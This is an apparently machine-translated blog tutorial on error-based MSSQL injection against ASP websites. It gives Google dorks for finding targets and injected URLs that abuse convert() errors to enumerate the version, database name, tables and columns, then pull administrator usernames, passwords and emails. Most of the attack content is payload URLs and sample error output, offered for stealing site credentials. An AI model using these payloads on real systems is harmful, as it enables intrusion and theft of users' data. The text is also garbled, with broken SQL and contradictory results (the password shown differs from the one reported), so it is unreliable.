Loading...

MSSQL - injection, method of attack! ###########################

1.1 Introduction 1.2 How to ask Vulnerability page? 1.3 How to prove that the site of weakness? 1.4 How to find version / name of the DB...

1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?



[1.1 Introduction]
############


This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.

There are several types of attacks in this way:

* - Normal MSSQL SQL Injection attacks
* - MSSQL injection in Web services (SOAP injection)
* - Union with MSSQL injection attack
* - ODBC error attack the "Convert"
* - MSSQL Blind SQL Injection attacks, etc. ..


For this will be used for writing this type of attack:

"Attack of the ODBC error message" Convert "


[1.2 How to ask Vulnerability page? ]
############################


How to ask who Vulnerability page is easy. This can use Google services company giant.

Let's open: Google


I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
ETC ....( I decided some examples, you can now use the logic, for better dorks)


[1.3 How to prove that the site of weakness? ]
##################################


So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:


++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++


These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.

Should now act as an example here, and where to put high ( ').



For example:

--------------------------------------
http://www.localhost.com/ / news.asp? id = 100 '
--------------------------------------


Now we can say that the error is displayed:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e14 '

Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++


This page has weaknesses!


[1.4 How to find version 2.4 / DB name? ]
############################



Let the example easier to understand:

Version:

-------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
-------------------------------------------------- ------------------



And we have presented an example:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 (Build 6002: Service Pack 2) (SM), a data type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++




Now go find DB_Name:

-------------------------------------------------- -------------------
http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
-------------------------------------------------- -------------------


eg.


++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++


[1.5 How to discover the names table (table_name)]
######################################


Because it is discovered, or simply to find the side of the table goes through this method.

For example:


-------------------------------------------------- -------------------------------------------------- --------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------



And now there will be a mistake, such as:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is when converting nvarchar value of users' data on the type Int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++



That is, in this case the table (table_name) The first is the 'Users', now find the following table:

For example:


-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------



And now an error message will appear the same and will give another table:

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not news when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++


Another table in this case is 'news'

Now to find the table (table_name) third goes like this:

For example:



-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------



I appear to us the third table:


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is when converting nvarchar value categories' of data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++



Then the third table 'categories', and so on until you find all the tables.

For example:


-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------


[1.6 How to discover the names of column (column_name)]
###########################################


-If you want to column_name for users as' go:

For example:



-------------------------------------------------- -------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value 'Name' to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++


So colums name for the table (table_name) 'Users' the 'name'

Now find the column (column_name) other at the same table 'Users':

For example:



-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not a password when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++



columnes name (column_name) the other is 'password', now go find a rotating column_name:

For example:


-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value 'emailaddress' to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++


Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!



[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###



To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.

In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!

Some have now replaced the example:



-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion is not an administrator when converting nvarchar value 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++


user name : Administrator

Replacing now the first column "Name" in the second column "password":

For example:



-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
-------------------------------------------------- -----------------------------------------

++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '

Conversion failed when converting nvarchar value '123456 'to data type int.

/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++



password: administratorpassword123

Now, instead of rotating columns works the same as above:

For example:



-------------------------------------------------- ---------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
-------------------------------------------------- ---------------------------------------------


emailaddress: king.cyborg@yahoo.com

Here then we have achieved some info on, and the name / pass and emailaddress page.

user name: Administrator
password: administratorpassword123
emailaddress: [email]king.cyborg@yahoo.com/email]


[ 1.8 Conclusion ]
############


================================================== ===========================
www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================
Reactions: 

Post a Comment

emo-but-icon

Home item

Follow by Email

Recommend on Google

Advertisements

Advertisements

Popular Posts

Random Posts

Recent Posts

ADS

eXTReMe Tracker